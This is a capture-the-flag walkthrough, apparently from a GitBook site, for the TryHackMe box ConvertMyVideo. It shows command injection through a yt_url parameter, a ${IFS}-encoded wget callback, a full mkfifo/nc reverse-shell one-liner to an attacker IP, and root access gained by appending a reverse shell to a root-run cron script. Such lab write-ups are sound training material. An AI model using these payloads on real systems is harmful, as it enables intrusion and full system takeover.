Write-Ups
  • Intro
  • Active Directory
    • HTB | Forest
    • HTB | Sauna
    • HTB | Active
    • HTB | Blackfield
    • HTB | Resolute
    • HTB | Cascade
    • HTB | Cicada
    • HTB | Administrator
    • HTB | Authority
    • HTB | Office
  • Windows
    • HTB | Devel
    • HTB | Chatterbox
    • HTB | SecNotes
    • HTB | Access
    • HTB | Jeeves
    • HTB | Artic
    • HTB | Bastard
    • HTB | Bastion
    • HTB | Querier
  • Linux
    • HTB | BoardLight
    • THM | CMess
    • THM | ConvertMyVideo
    • HTB | Editorial
    • HTB | Mirai
    • HTB | Nibbles
    • HTB | Help
    • HTB | SwagShop
    • HTB | Jarvis
    • HTB | Sea
    • HTB | Chemistry
Powered by GitBook
On this page
  • NMAP
  • Port 80
  • Foothold/shell
  • Priv Esc
  1. Linux

THM | ConvertMyVideo

PreviousTHM | CMessNextHTB | Editorial

Last updated 7 months ago

This is a Linux box. You can find it here.

Skill Learned

  • Command Injection

  • Finding Cron via Pspy64

NMAP

IP:10.10.185.77

Port 80

start burp

we found an error in the response

Foothold/shell

we can try for command injection 

`whoami`

we get www-data

Let's see if we can get a hit on our machine using wget, more on ${IFS} refer this

using yt_url=`wget${IFS}http://10.9.0.78/`

we get the hit

Let's try for a reverse shell 

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

replace " " with ${IFS} and "&" with %26

we get the shell but the connection is lost soon

let's try uploading the script and then executing it

now let's execute it

found flag.txt

Priv Esc

copy LinEnum.sh to the box and run it

we found cron is running

Let's copy pspy64 to the box and run

I found the cron script clean.sh

we can append the reverse shell and since it is triggered by the root we might get root shell

and wait for it to trigger

and we are the root

nmap
port 80
burp
whoami
flag.txt
found cron running
./pspy64
cat clean.sh
edit clean.sh
root